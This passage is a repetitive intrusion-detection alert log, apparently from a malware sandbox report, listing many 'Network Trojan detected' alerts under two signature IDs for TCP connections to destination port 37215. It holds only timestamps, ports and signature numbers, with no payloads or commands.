                Timestamp:06/14/24-10:43:37.758982
                SID:2835222
                Source Port:60046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568643
                SID:2829579
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453086
                SID:2829579
                Source Port:42200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274757
                SID:2835222
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408674
                SID:2835222
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025336
                SID:2829579
                Source Port:50242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849250
                SID:2829579
                Source Port:35902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830868
                SID:2829579
                Source Port:50170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110926
                SID:2829579
                Source Port:34656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277363
                SID:2835222
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072803
                SID:2829579
                Source Port:52870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564897
                SID:2829579
                Source Port:37156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969785
                SID:2835222
                Source Port:40630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185553
                SID:2829579
                Source Port:45970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624978
                SID:2829579
                Source Port:37156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860532
                SID:2829579
                Source Port:39342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989512
                SID:2829579
                Source Port:38328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644562
                SID:2835222
                Source Port:53588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149745
                SID:2829579
                Source Port:48158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689316
                SID:2829579
                Source Port:47316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829579
                SID:2829579
                Source Port:33262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015791
                SID:2829579
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501263
                SID:2835222
                Source Port:42776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943137
                SID:2829579
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228841
                SID:2835222
                Source Port:55344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899108
                SID:2835222
                Source Port:49590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717541
                SID:2835222
                Source Port:50176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829935
                SID:2829579
                Source Port:57882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846899
                SID:2835222
                Source Port:57652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581942
                SID:2829579
                Source Port:45398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846197
                SID:2829579
                Source Port:57688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759491
                SID:2829579
                Source Port:59552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735947
                SID:2829579
                Source Port:47066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027645
                SID:2835222
                Source Port:35336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668740
                SID:2835222
                Source Port:45148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846422
                SID:2835222
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504953
                SID:2829579
                Source Port:39722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544230
                SID:2835222
                Source Port:46434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679469
                SID:2835222
                Source Port:42234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942659
                SID:2835222
                Source Port:50936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989654
                SID:2835222
                Source Port:57434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018982
                SID:2835222
                Source Port:33276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419106
                SID:2829579
                Source Port:54226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323712
                SID:2829579
                Source Port:35352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902485
                SID:2829579
                Source Port:33692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151109
                SID:2835222
                Source Port:49282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762156
                SID:2829579
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145995
                SID:2829579
                Source Port:36522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146025
                SID:2829579
                Source Port:58870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683898
                SID:2829579
                Source Port:56234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340144
                SID:2835222
                Source Port:46142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971743
                SID:2829579
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944438
                SID:2829579
                Source Port:33438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383090
                SID:2829579
                Source Port:53512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276083
                SID:2835222
                Source Port:53838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791084
                SID:2829579
                Source Port:51816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230571
                SID:2835222
                Source Port:35974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965954
                SID:2835222
                Source Port:35412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763079
                SID:2829579
                Source Port:55334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344137
                SID:2829579
                Source Port:41802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882040
                SID:2829579
                Source Port:56252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074708
                SID:2835222
                Source Port:59330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145933
                SID:2829579
                Source Port:55474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763393
                SID:2829579
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718289
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644283
                SID:2829579
                Source Port:60680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199056
                SID:2829579
                Source Port:58332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014060
                SID:2835222
                Source Port:34572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275002
                SID:2829579
                Source Port:44998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025460
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150066
                SID:2829579
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451543
                SID:2829579
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.984898
                SID:2835222
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160215
                SID:2829579
                Source Port:48930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774833
                SID:2829579
                Source Port:57934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450950
                SID:2829579
                Source Port:50100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614040
                SID:2829579
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880201
                SID:2829579
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242864
                SID:2835222
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420611
                SID:2835222
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452286
                SID:2835222
                Source Port:41772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230225
                SID:2835222
                Source Port:52010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453256
                SID:2835222
                Source Port:40012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807896
                SID:2829579
                Source Port:32942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663855
                SID:2835222
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339746
                SID:2829579
                Source Port:57698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132467
                SID:2835222
                Source Port:36006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827500
                SID:2835222
                Source Port:38622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967921
                SID:2829579
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803456
                SID:2835222
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862340
                SID:2835222
                Source Port:49448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968651
                SID:2835222
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812397
                SID:2829579
                Source Port:50326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151337
                SID:2829579
                Source Port:55592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736421
                SID:2829579
                Source Port:38102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226035
                SID:2835222
                Source Port:59154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879938
                SID:2835222
                Source Port:46602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547103
                SID:2829579
                Source Port:47112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518885
                SID:2829579
                Source Port:41938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424724
                SID:2829579
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647198
                SID:2835222
                Source Port:47408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544731
                SID:2829579
                Source Port:39176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151514
                SID:2829579
                Source Port:43960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184183
                SID:2835222
                Source Port:45656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368079
                SID:2829579
                Source Port:44302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453540
                SID:2829579
                Source Port:59376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202737
                SID:2829579
                Source Port:35988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913439
                SID:2829579
                Source Port:58738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081643
                SID:2835222
                Source Port:39494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295708
                SID:2835222
                Source Port:56096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718315
                SID:2829579
                Source Port:38896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830750
                SID:2835222
                Source Port:59282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183865
                SID:2835222
                Source Port:58222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806151
                SID:2835222
                Source Port:57064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879444
                SID:2829579
                Source Port:58900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408825
                SID:2829579
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503707
                SID:2835222
                Source Port:58166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718186
                SID:2829579
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055509
                SID:2835222
                Source Port:43156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812011
                SID:2835222
                Source Port:51052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014559
                SID:2835222
                Source Port:42412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203026
                SID:2829579
                Source Port:39978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013828
                SID:2835222
                Source Port:55552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112048
                SID:2835222
                Source Port:37164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806972
                SID:2829579
                Source Port:53532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517485
                SID:2835222
                Source Port:34644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325137
                SID:2835222
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671014
                SID:2829579
                Source Port:49844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052072
                SID:2835222
                Source Port:49476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276446
                SID:2835222
                Source Port:55986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381229
                SID:2835222
                Source Port:37790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133695
                SID:2835222
                Source Port:60158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941928
                SID:2835222
                Source Port:48214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700207
                SID:2829579
                Source Port:45904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916463
                SID:2835222
                Source Port:37596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813053
                SID:2835222
                Source Port:50756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163666
                SID:2835222
                Source Port:55030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229066
                SID:2829579
                Source Port:46074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146967
                SID:2835222
                Source Port:44206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944487
                SID:2829579
                Source Port:52812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324465
                SID:2829579
                Source Port:46754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029789
                SID:2829579
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965393
                SID:2829579
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717523
                SID:2835222
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860755
                SID:2829579
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990962
                SID:2835222
                Source Port:47954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717214
                SID:2829579
                Source Port:47034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230443
                SID:2829579
                Source Port:46572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383671
                SID:2829579
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567515
                SID:2829579
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763396
                SID:2829579
                Source Port:35462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160887
                SID:2829579
                Source Port:35654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054404
                SID:2835222
                Source Port:42226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565625
                SID:2829579
                Source Port:50754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340171
                SID:2829579
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410831
                SID:2835222
                Source Port:55588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115996
                SID:2829579
                Source Port:50436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.252996
                SID:2829579
                Source Port:43544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760406
                SID:2835222
                Source Port:35128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001169
                SID:2835222
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163387
                SID:2835222
                Source Port:33124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676941
                SID:2829579
                Source Port:52570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182631
                SID:2835222
                Source Port:41878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702431
                SID:2829579
                Source Port:37462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.912830
                SID:2829579
                Source Port:59308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244442
                SID:2829579
                Source Port:49134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966011
                SID:2835222
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025673
                SID:2829579
                Source Port:55294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045398
                SID:2835222
                Source Port:49826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662270
                SID:2835222
                Source Port:38556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766268
                SID:2829579
                Source Port:54614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229747
                SID:2835222
                Source Port:43682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178912
                SID:2829579
                Source Port:43326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681847
                SID:2829579
                Source Port:44140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968836
                SID:2835222
                Source Port:36954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716368
                SID:2835222
                Source Port:54926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146945
                SID:2835222
                Source Port:53820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410959
                SID:2835222
                Source Port:45154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228728
                SID:2835222
                Source Port:52234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788962
                SID:2835222
                Source Port:60500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548932
                SID:2829579
                Source Port:60268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.009911
                SID:2829579
                Source Port:46196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384331
                SID:2835222
                Source Port:44110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025397
                SID:2829579
                Source Port:43250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806431
                SID:2829579
                Source Port:54966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045901
                SID:2829579
                Source Port:44884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274480
                SID:2829579
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792602
                SID:2829579
                Source Port:36832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295530
                SID:2835222
                Source Port:58842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663064
                SID:2829579
                Source Port:42436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724549
                SID:2835222
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804875
                SID:2835222
                Source Port:41836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943423
                SID:2829579
                Source Port:33604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502481
                SID:2835222
                Source Port:50840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365783
                SID:2829579
                Source Port:33674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790738
                SID:2835222
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542872
                SID:2829579
                Source Port:34608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367211
